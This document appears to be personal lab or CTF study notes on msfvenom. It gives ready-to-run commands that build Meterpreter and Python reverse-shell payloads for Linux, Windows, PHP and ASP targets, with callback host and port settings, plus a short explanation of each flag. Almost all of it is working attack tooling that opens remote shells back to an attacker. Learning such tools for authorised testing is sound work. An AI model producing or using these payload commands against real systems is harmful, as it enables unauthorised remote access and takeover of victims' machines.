web venom builder:
usage:
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell.elf LHOST=10.14.110.172 LPORT=4444
-p: sets the payload
msfvenom --list payloads to see payloads available
-f: sets the file type
-o: specifies the output name
LHOST and LPORT are self explanatory tbh :v
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe -o rev_shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp -o rev_shell.asp
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw -o rev_shell.py
notes
msfvenom -l payloads to see all payloads with descriptions
msfvenom --list formats to see supported output formats